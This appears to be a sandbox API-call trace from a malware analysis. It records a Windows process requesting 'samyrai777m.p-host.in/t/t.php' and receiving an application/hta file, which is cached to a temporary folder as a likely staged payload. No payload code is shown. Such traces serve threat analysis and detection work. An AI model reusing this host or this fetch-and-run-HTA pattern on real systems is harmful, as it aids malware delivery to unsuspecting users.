[0067.600] IUnknown:QueryInterface (in: This=0x27e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x20f480 | out: ppvObject=0x20f480*=0x27e180) returned 0x0
[0067.600] IUnknown:Release (This=0x27e180) returned 0xa
[0067.600] IUnknown:AddRef (This=0x27e180) returned 0xb
[0067.600] IUri:GetScheme (in: This=0x27e180, pdwScheme=0x20f450 | out: pdwScheme=0x20f450*=0x2) returned 0x0
[0067.600] IUri:GetAbsoluteUri (in: This=0x27e180, pbstrAbsoluteUri=0x20f460 | out: pbstrAbsoluteUri=0x20f460*="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x0
[0067.600] GetProcAddress (hModule=0x7fefde70000, lpProcName=0x7) returned 0x7fefde71020
[0067.600] SysStringLen (param_1="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x31
[0067.600] CreateUri (in: pwzURI="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x20f860 | out: ppURI=0x20f860*=0x27e180) returned 0x0
[0067.600] IUnknown:Release (This=0x27e180) returned 0xb
[0067.600] IUri:GetScheme (in: This=0x27e180, pdwScheme=0x20f3f0 | out: pdwScheme=0x20f3f0*=0x2) returned 0x0
[0067.600] IUnknown:AddRef (This=0x27e180) returned 0xc
[0067.600] IUri:GetPropertyDWORD (in: This=0x27e180, uriProp=0x11, pdwProperty=0x20f1a8, dwFlags=0x0 | out: pdwProperty=0x20f1a8*=0x2) returned 0x0
[0067.600] IInternetSecurityManager:GetSecurityId (in: This=0x2912c0, pwszUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", pbSecurityId=0x20f260, pcbSecurityId=0x20f250*=0x200, dwReserved=0x0 | out: pbSecurityId=0x20f260*=0x68, pcbSecurityId=0x20f250*=0x22) returned 0x0
[0067.739] IUnknown:Release (This=0x27e180) returned 0xb
[0067.740] ParseURLW (in: pcszURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppu=0x20f3f0 | out: ppu=0x20f3f0) returned 0x0
[0067.740] GetDC (hWnd=0x0) returned 0x530107fa
[0067.740] CreateCompatibleBitmap (hdc=0x530107fa, cx=1, cy=1) returned 0x1050926
[0067.740] GetDIBits (in: hdc=0x530107fa, hbm=0x1050926, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x20efa0, usage=0x0 | out: lpvBits=0x0, lpbmi=0x20efa0) returned 1
[0067.740] GetDIBits (in: hdc=0x530107fa, hbm=0x1050926, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x20efa0, usage=0x0 | out: lpvBits=0x0, lpbmi=0x20efa0) returned 1
[0067.740] DeleteObject (ho=0x1050926) returned 1
[0067.740] GetSysColor (nIndex=0) returned 0xc8c8c8
[0067.740] GetSysColor (nIndex=1) returned 0x0
[0067.740] GetSysColor (nIndex=2) returned 0xd1b499
[0067.740] GetSysColor (nIndex=3) returned 0xdbcdbf
[0067.740] GetSysColor (nIndex=4) returned 0xf0f0f0
[0067.740] GetSysColor (nIndex=5) returned 0xffffff
[0067.740] GetSysColor (nIndex=6) returned 0x646464
[0067.740] GetSysColor (nIndex=7) returned 0x0
[0067.740] GetSysColor (nIndex=8) returned 0x0
[0067.740] GetSysColor (nIndex=9) returned 0x0
[0067.740] GetSysColor (nIndex=10) returned 0xb4b4b4
[0067.740] GetSysColor (nIndex=11) returned 0xfcf7f4
[0067.740] GetSysColor (nIndex=12) returned 0xababab
[0067.740] GetSysColor (nIndex=13) returned 0xff9933
[0067.740] GetSysColor (nIndex=14) returned 0xffffff
[0067.740] GetSysColor (nIndex=15) returned 0xf0f0f0
[0067.740] GetSysColor (nIndex=16) returned 0xa0a0a0
[0067.740] GetSysColor (nIndex=17) returned 0x6d6d6d
[0067.740] GetSysColor (nIndex=18) returned 0x0
[0067.740] GetSysColor (nIndex=19) returned 0x544e43
[0067.740] GetSysColor (nIndex=20) returned 0xffffff
[0067.740] GetSysColor (nIndex=21) returned 0x696969
[0067.740] GetSysColor (nIndex=22) returned 0xe3e3e3
[0067.740] GetSysColor (nIndex=23) returned 0x0
[0067.740] GetSysColor (nIndex=24) returned 0xe1ffff
[0067.740] GetSysColor (nIndex=25) returned 0x0
[0067.740] GetSysColor (nIndex=26) returned 0xcc6600
[0067.740] GetSysColor (nIndex=27) returned 0xead1b9
[0067.740] GetSysColor (nIndex=28) returned 0xf2e4d7
[0067.740] GetSysColor (nIndex=29) returned 0xff9933
[0067.740] GetSysColor (nIndex=30) returned 0xf0f0f0
[0067.740] GetSysColor (nIndex=31) returned 0x0
[0067.740] GetSysColor (nIndex=32) returned 0x0
[0067.740] GetSysColor (nIndex=33) returned 0x0
[0067.740] GetSysColor (nIndex=34) returned 0x0
[0067.740] GetSysColor (nIndex=35) returned 0x0
[0067.740] GetSysColor (nIndex=36) returned 0x0
[0067.740] GetSysColor (nIndex=37) returned 0x0
[0067.740] GetSysColor (nIndex=38) returned 0x0
[0067.740] GetSysColor (nIndex=39) returned 0x0
[0067.740] GetSysColor (nIndex=40) returned 0x0
[0067.740] GetSysColor (nIndex=41) returned 0x0
[0067.740] GetSysColor (nIndex=42) returned 0x0
[0067.740] GetSysColor (nIndex=43) returned 0x0
[0067.740] GetSysColor (nIndex=44) returned 0x0
[0067.740] GetSysColor (nIndex=45) returned 0x0
[0067.740] GetSysColor (nIndex=46) returned 0x0
[0067.741] GetSysColor (nIndex=47) returned 0x0
[0067.741] GetSysColor (nIndex=48) returned 0x0
[0067.741] GetSysColor (nIndex=49) returned 0x0
[0067.741] GetSysColor (nIndex=50) returned 0x0
[0067.741] GetSysColor (nIndex=51) returned 0x0
[0067.741] GetSysColor (nIndex=52) returned 0x0
[0067.741] GetSysColor (nIndex=53) returned 0x0
[0067.741] GetSysColor (nIndex=54) returned 0x0
[0067.741] GetSysColor (nIndex=55) returned 0x0
[0067.741] GetSysColor (nIndex=56) returned 0x0
[0067.741] GetSysColor (nIndex=57) returned 0x0
[0067.741] GetSysColor (nIndex=58) returned 0x0
[0067.741] GetSysColor (nIndex=59) returned 0x0
[0067.741] GetSysColor (nIndex=60) returned 0x0
[0067.741] GetSysColor (nIndex=61) returned 0x0
[0067.741] GetSysColor (nIndex=62) returned 0x0
[0067.741] GetSysColor (nIndex=63) returned 0x0
[0067.741] GetDeviceCaps (hdc=0x530107fa, index=38) returned 32409
[0067.741] ReleaseDC (hWnd=0x0, hDC=0x530107fa) returned 1
[0067.741] GetCurrentThreadId () returned 0x628
[0067.741] GetCursorPos (in: lpPoint=0x20f130 | out: lpPoint=0x20f130*(x=724, y=422)) returned 1
[0067.741] GetKeyState (nVirtKey=16) returned 0
[0067.741] GetKeyState (nVirtKey=17) returned 0
[0067.741] GetKeyState (nVirtKey=18) returned 0
[0067.741] GetKeyState (nVirtKey=160) returned 0
[0067.741] GetKeyState (nVirtKey=162) returned 0
[0067.741] GetKeyState (nVirtKey=164) returned 0
[0067.743] GetProcAddress (hModule=0x7fefde70000, lpProcName=0x8) returned 0x7fefde713f0
[0067.743] GetCurrentThreadId () returned 0x628
[0067.743] ParseURLW (in: pcszURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppu=0x20f3c0 | out: ppu=0x20f3c0) returned 0x0
[0067.743] CreateUri (in: pwzURI="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x20f380 | out: ppURI=0x20f380*=0x27e180) returned 0x0
[0067.744] IUnknown:AddRef (This=0x27e180) returned 0xd
[0067.744] IInternetSecurityManager:SetSecuritySite (This=0x7fee1042708, pSite=0x26afb0) returned 0x800c0011
[0067.744] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.744] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.744] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0067.744] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fee1042708, pwszUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwAction=0x2700, pPolicy=0x20f330, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x20f330*=0x0) returned 0x0
[0067.744] IUnknown:Release (This=0x27e180) returned 0xc
[0067.744] IUnknown:Release (This=0x27e180) returned 0xb
[0067.744] IUnknown:AddRef (This=0x27e180) returned 0xc
[0067.744] IUri:GetPropertyDWORD (in: This=0x27e180, uriProp=0x11, pdwProperty=0x20f178, dwFlags=0x0 | out: pdwProperty=0x20f178*=0x2) returned 0x0
[0067.744] IInternetSecurityManager:GetSecurityId (in: This=0x2912c0, pwszUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", pbSecurityId=0x20f210, pcbSecurityId=0x20f200*=0x200, dwReserved=0x0 | out: pbSecurityId=0x20f210*=0x68, pcbSecurityId=0x20f200*=0x22) returned 0x0
[0067.744] IInternetSecurityManager:SetSecuritySite (This=0x7fee1042708, pSite=0x265448) returned 0x800c0011
[0067.744] IUnknown:Release (This=0x27e180) returned 0xb
[0067.744] CoInternetGetSession (in: dwSessionMode=0x0, ppIInternetSession=0x20f440, dwReserved=0x0 | out: ppIInternetSession=0x20f440*=0x294ce0) returned 0x0
[0067.744] IInternetSession:RegisterNameSpace (This=0x294ce0, pCF=0x7fee1044f60, rclsid=0x7fee0f21b30, pwzProtocol="res", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0
[0067.745] IUnknown:AddRef (This=0x7fee1044f60) returned 0x1
[0067.745] IInternetSession:RegisterNameSpace (This=0x294ce0, pCF=0x7fee1044fa0, rclsid=0x7fee0f21b10, pwzProtocol="about", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0
[0067.745] IUnknown:AddRef (This=0x7fee1044fa0) returned 0x1
[0067.745] StrCmpICW (pszStr1="http://www.samyrai777m.p-host.in/t/t.php", pszStr2="res://ieframe.dll/PhishSite.htm") returned -10
[0067.745] IUnknown:QueryInterface (in: This=0x27e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x20f330 | out: ppvObject=0x20f330*=0x27e180) returned 0x0
[0067.745] IUnknown:Release (This=0x27e180) returned 0xb
[0067.746] IUnknown:AddRef (This=0x27e180) returned 0xc
[0067.746] IUnknown:AddRef (This=0x27e180) returned 0xd
[0067.746] IUnknown:QueryInterface (in: This=0x27e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x20f2a0 | out: ppvObject=0x20f2a0*=0x27e180) returned 0x0
[0067.746] IUnknown:Release (This=0x27e180) returned 0xd
[0067.746] IUnknown:AddRef (This=0x27e180) returned 0xe
[0067.746] IUnknown:Release (This=0x27e180) returned 0xd
[0067.746] IUri:GetScheme (in: This=0x27e180, pdwScheme=0x20f3b0 | out: pdwScheme=0x20f3b0*=0x2) returned 0x0
[0067.746] PostMessageW (hWnd=0x1021c, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1
[0067.746] IUnknown:AddRef (This=0x27e180) returned 0xe
[0067.746] IUnknown:QueryInterface (in: This=0x27e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x20f2a0 | out: ppvObject=0x20f2a0*=0x27e180) returned 0x0
[0067.747] IUnknown:Release (This=0x27e180) returned 0xe
[0067.747] IUnknown:AddRef (This=0x27e180) returned 0xf
[0067.747] IUnknown:QueryInterface (in: This=0x27e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x20ee90 | out: ppvObject=0x20ee90*=0x27e180) returned 0x0
[0067.747] IUnknown:Release (This=0x27e180) returned 0xf
[0067.747] IUnknown:AddRef (This=0x27e180) returned 0x10
[0067.747] IUnknown:AddRef (This=0x27e180) returned 0x11
[0067.747] IUnknown:AddRef (This=0x27e180) returned 0x12
[0067.747] IUnknown:QueryInterface (in: This=0x27e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x20ee60 | out: ppvObject=0x20ee60*=0x27e180) returned 0x0
[0067.747] IUnknown:Release (This=0x27e180) returned 0x12
[0067.747] IUnknown:AddRef (This=0x27e180) returned 0x13
[0067.747] IUri:GetScheme (in: This=0x27e180, pdwScheme=0x2ba158 | out: pdwScheme=0x2ba158*=0x2) returned 0x0
[0067.747] IMoniker:IsSystemMoniker (in: This=0x265140, pdwMksys=0x20eef0 | out: pdwMksys=0x20eef0*=0x6) returned 0x0
[0067.747] IUnknown:QueryInterface (in: This=0x27e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x20ee90 | out: ppvObject=0x20ee90*=0x27e180) returned 0x0
[0067.747] IUnknown:Release (This=0x27e180) returned 0x13
[0067.747] IUnknown:AddRef (This=0x27e180) returned 0x14
[0067.747] IInternetSession:CreateBinding (in: This=0x294ce0, pbc=0x0, szUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", pUnkOuter=0x0, ppunk=0x0, ppOInetProt=0x2b9690, dwOption=0x0 | out: ppunk=0x0, ppOInetProt=0x2b9690*=0x2ba240) returned 0x0
[0067.748] IUnknown:QueryInterface (in: This=0x2ba240, riid=0x7fee0f84860*(Data1=0x53c84785, Data2=0x8425, Data3=0x4dc5, Data4=([0]=0x97, [1]=0x1b, [2]=0xe5, [3]=0x8d, [4]=0x9c, [5]=0x19, [6]=0xf9, [7]=0xb6)), ppvObject=0x20ee00 | out: ppvObject=0x20ee00*=0x0) returned 0x80004002
[0067.748] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20ed18 | out: phkResult=0x20ed18*=0x304) returned 0x0
[0067.748] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20ed20 | out: phkResult=0x20ed20*=0x2fc) returned 0x0
[0067.748] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x20eca8 | out: phkResult=0x20eca8*=0x0) returned 0x2
[0067.748] RegOpenKeyExW (in: hKey=0x304, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x20eca8 | out: phkResult=0x20eca8*=0x308) returned 0x0
[0067.748] SHRegGetValueW () returned 0x2
[0067.748] SHRegGetValueW () returned 0x2
[0067.748] RegCloseKey (hKey=0x308) returned 0x0
[0067.748] RegCloseKey (hKey=0x0) returned 0x6
[0067.748] RegCloseKey (hKey=0x0) returned 0x6
[0067.748] RegCloseKey (hKey=0x304) returned 0x0
[0067.748] RegCloseKey (hKey=0x2fc) returned 0x0
[0067.748] IUnknown:AddRef (This=0x2ba240) returned 0x2
[0067.748] IUnknown:QueryInterface (in: This=0x2ba240, riid=0x7fee0fdb188*(Data1=0xc7a98e66, Data2=0x1010, Data3=0x492c, Data4=([0]=0xa1, [1]=0xc8, [2]=0xc8, [3]=0x9, [4]=0xe1, [5]=0xf7, [6]=0x59, [7]=0x5)), ppvObject=0x20ee30 | out: ppvObject=0x20ee30*=0x2ba240) returned 0x0
[0067.749] IInternetProtocolEx:StartEx (This=0x2ba240, pUri=0x27e180, pOIProtSink=0x2ba020, pOIBindInfo=0x2b9fb0, grfPI=0x10, dwReserved=0x0) returned 0x0
[0067.749] IUnknown:AddRef (This=0x2ba020) returned 0x3
[0067.749] IInternetBindInfo:GetBindInfo (in: This=0x2b9fb0, grfBINDF=0x2ba468, pbindinfo=0x2ba470 | out: grfBINDF=0x2ba468*=0x20083, pbindinfo=0x2ba470) returned 0x0
[0067.749] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20ec28 | out: phkResult=0x20ec28*=0x2fc) returned 0x0
[0067.749] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x20ec30 | out: phkResult=0x20ec30*=0x304) returned 0x0
[0067.749] RegOpenKeyExW (in: hKey=0x304, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x20ebb8 | out: phkResult=0x20ebb8*=0x0) returned 0x2
[0067.749] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x20ebb8 | out: phkResult=0x20ebb8*=0x0) returned 0x2
[0067.749] RegCloseKey (hKey=0x0) returned 0x6
[0067.749] RegCloseKey (hKey=0x0) returned 0x6
[0067.749] RegCloseKey (hKey=0x2fc) returned 0x0
[0067.749] RegCloseKey (hKey=0x304) returned 0x0
[0067.749] IUnknown:AddRef (This=0x2ba020) returned 0x5
[0067.749] IInternetProtocolSink:ReportProgress (This=0x2ba020, ulStatusCode=0x1e, szStatusText=0x0) returned 0x0
[0067.780] IInternetBindInfo:GetBindString (in: This=0x2b9fb0, ulStringType=0x2, ppwzStr=0x20e460, cEl=0x100, pcElFetched=0x20ec90*=0x100 | out: ppwzStr=0x20e460*="*/*", pcElFetched=0x20ec90*=0x1) returned 0x0
[0067.780] CoTaskMemAlloc (cb=0x8) returned 0x27ded0
[0067.780] IUnknown:QueryInterface (in: This=0x2ba020, riid=0x7fefe4b1918*(Data1=0x58dfc7d0, Data2=0x5381, Data3=0x43e5, Data4=([0]=0x9d, [1]=0x72, [2]=0x4c, [3]=0xdd, [4]=0xe4, [5]=0xcb, [6]=0xf, [7]=0x1a)), ppvObject=0x20eca8 | out: ppvObject=0x20eca8*=0x0) returned 0x80004002
[0067.781] IUnknown:QueryInterface (in: This=0x2ba020, riid=0x7fefe4ae970*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x2ba378 | out: ppvObject=0x2ba378*=0x2b9fa0) returned 0x0
[0067.781] IServiceProvider:QueryService (in: This=0x2b9fa0, guidService=0x7fefe4af090*(Data1=0x79eac9d2, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7fefe4af090*(Data1=0x79eac9d2, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2ba5d0 | out: ppvObject=0x2ba5d0*=0x2b9fa8) returned 0x0
[0067.781] IHttpNegotiate:BeginningTransaction (in: This=0x2b9fa8, szUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", szHeaders="UA-CPU: AMD64\r\nAccept-Encoding: gzip, deflate", dwReserved=0x0, pszAdditionalHeaders=0x20d980 | out: pszAdditionalHeaders=0x20d980*="Accept-Language: en-US\r\n") returned 0x0
[0067.781] CreateUri (in: pwzURI="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x20d840 | out: ppURI=0x20d840*=0x27e180) returned 0x0
[0067.781] IUnknown:AddRef (This=0x27e180) returned 0x19
[0067.781] IUnknown:QueryInterface (in: This=0x27e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x20d7f0 | out: ppvObject=0x20d7f0*=0x27e180) returned 0x0
[0067.781] IUnknown:Release (This=0x27e180) returned 0x19
[0067.781] IUnknown:AddRef (This=0x27e180) returned 0x1a
[0067.782] CoTaskMemAlloc (cb=0x32) returned 0x2bec80
[0067.782] IUnknown:Release (This=0x27e180) returned 0x19
[0067.782] IServiceProvider:QueryService (in: This=0x2b9fa0, guidService=0x7fefe4af170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x7fefe4af170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x2ba608 | out: ppvObject=0x2ba608*=0x2b9fa8) returned 0x0
[0067.782] IHttpNegotiate2:GetRootSecurityId (in: This=0x2b9fa8, pbSecurityId=0x20d9d0, pcbSecurityId=0x2ba5b0*=0x200, dwReserved=0x0 | out: pbSecurityId=0x20d9d0*=0xe0, pcbSecurityId=0x2ba5b0*=0x200) returned 0x80004005
[0067.782] IHttpNegotiate:OnResponse (in: This=0x2b9fa8, dwResponseCode=0xc8, szResponseHeaders="HTTP/1.1 200 OK\r\nContent-Type: application/hta\r\nVary:User-Agent\r\nContent-Length: 3313\r\n\r\n", szRequestHeaders=0x0, pszAdditionalRequestHeaders=0x0 | out: pszAdditionalRequestHeaders=0x0) returned 0x0
[0067.782] IInternetProtocolSink:ReportProgress (This=0x2ba020, ulStatusCode=0x1f, szStatusText="application/hta") returned 0x0
[0067.782] RegisterClipboardFormatA (lpszFormat="text/html") returned 0xc19a
[0067.782] RegisterClipboardFormatA (lpszFormat="text/plain") returned 0xc19b
[0067.782] RegisterClipboardFormatA (lpszFormat="text/x-component") returned 0xc1c0
[0067.782] RegisterClipboardFormatA (lpszFormat="image/gif") returned 0xc1a5
[0067.782] RegisterClipboardFormatA (lpszFormat="image/jpeg") returned 0xc1a7
[0067.782] RegisterClipboardFormatA (lpszFormat="image/pjpeg") returned 0xc1a6
[0067.783] RegisterClipboardFormatA (lpszFormat="image/bmp") returned 0xc1ab
[0067.783] RegisterClipboardFormatA (lpszFormat="image/x-jg") returned 0xc1ac
[0067.783] RegisterClipboardFormatA (lpszFormat="image/x-art") returned 0xc1ad
[0067.783] RegisterClipboardFormatA (lpszFormat="image/x-wmf") returned 0xc1af
[0067.783] RegisterClipboardFormatA (lpszFormat="image/x-emf") returned 0xc1ae
[0067.783] RegisterClipboardFormatA (lpszFormat="video/avi") returned 0xc1b1
[0067.783] RegisterClipboardFormatA (lpszFormat="video/x-msvideo") returned 0xc1b2
[0067.783] RegisterClipboardFormatA (lpszFormat="video/mpeg") returned 0xc1b3
[0067.783] RegisterClipboardFormatA (lpszFormat="video/quicktime") returned 0xc1c1
[0067.783] RegisterClipboardFormatA (lpszFormat="application/hta") returned 0xc1bf
[0067.783] RegisterClipboardFormatA (lpszFormat="image/x-png") returned 0xc1a9
[0067.783] RegisterClipboardFormatA (lpszFormat="image/png") returned 0xc1aa
[0067.783] RegisterClipboardFormatA (lpszFormat="image/x-icon") returned 0xc1b0
[0067.783] StrCmpNICW (lpStr1="applicat", lpStr2="text/css", nChar=8) returned -19
[0067.783] IInternetProtocolSink:ReportProgress (This=0x2ba020, ulStatusCode=0xe, szStatusText="C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\X9OHK109\\t[2].hta") returned 0x0
[0067.783] GetCurrentProcessId () returned 0x370
[0067.783] IInternetProtocolSink:ReportData (This=0x2ba020, grfBSCF=0xc, ulProgress=0x1, ulProgressMax=0xcf1) returned 0x0
[0067.783] IUnknown:QueryInterface (in: This=0x2ba240, riid=0x7fee0f1f430*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x20c088 | out: ppvObject=0x20c088*=0x2ba248) returned 0x0
[0067.783] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x2ba248, dwOption=0x1, pBuffer=0x20cab0*=0x0, pcbBuf=0x20c080*=0x100, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x20cab0*=0x61, pcbBuf=0x20c080*=0xf, pdwFlags=0x0, pdwReserved=0x0) returned 0x0
[0067.783] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x2ba248, dwOption=0xffff, pBuffer=0x20cbb0*=0x78, pcbBuf=0x20c080*=0x100, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x20cbb0*=0x76, pcbBuf=0x20c080*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0067.783] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x2ba248, dwOption=0x2e, pBuffer=0x20c8b0*=0x0, pcbBuf=0x20c0a0*=0x100, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x20c8b0*=0x76, pcbBuf=0x20c0a0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0067.783] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x2ba248, dwOption=0x4000000b, pBuffer=0x20c0b8*=0x0, pcbBuf=0x20c080*=0x10, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x20c0b8*=0x76, pcbBuf=0x20c080*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0067.783] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x2ba248, dwOption=0xffff, pBuffer=0x20c4b0*=0x58, pcbBuf=0x20c080*=0x400, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x20c4b0*=0x76, pcbBuf=0x20c080*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0067.783] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x2ba248, dwOption=0xffff, pBuffer=0x20c4b0*=0x44, pcbBuf=0x20c080*=0x400, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x20c4b0*=0x76, pcbBuf=0x20c080*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0067.783] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x2ba248, dwOption=0xffff, pBuffer=0x20c4b0*=0x43, pcbBuf=0x20c080*=0x400, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x20c4b0*=0x76, pcbBuf=0x20c080*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0067.783] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x2ba248, dwOption=0xffff, pBuffer=0x20c4b0*=0x58, pcbBuf=0x20c080*=0x400, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x20c4b0*=0x76, pcbBuf=0x20c080*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0067.784] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x2ba248, dwOption=0x20000013, pBuffer=0x2ba0e0*=0x0, pcbBuf=0x20c080*=0x4, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x2ba0e0*=0xc8, pcbBuf=0x20c080*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x0
[0067.784] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x2ba248, dwOption=0x12, pBuffer=0x20c3a0*=0x0, pcbBuf=0x20c0a8*=0xf, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x20c3a0*=0x48, pcbBuf=0x20c0a8*=0x8, pdwFlags=0x0, pdwReserved=0x0) returned 0x0
[0067.784] StrCmpICA (pszStr1="HTTP/1.0", pszStr2="HTTP/1.1") returned -1
[0067.784] IWinInetInfo:RemoteQueryOption (in: This=0x2ba248, dwOption=0x17, pBuffer=0x20c0a4*=0x0, pcbBuf=0x20c080*=0x4 | out: pBuffer=0x20c0a4*=0x1, pcbBuf=0x20c080*=0x4) returned 0x0
[0067.784] IWinInetInfo:RemoteQueryOption (in: This=0x2ba248, dwOption=0x1f, pBuffer=0x20c0a4*=0x1, pcbBuf=0x20c080*=0x4 | out: pBuffer=0x20c0a4*=0x0, pcbBuf=0x20c080*=0x4) returned 0x0
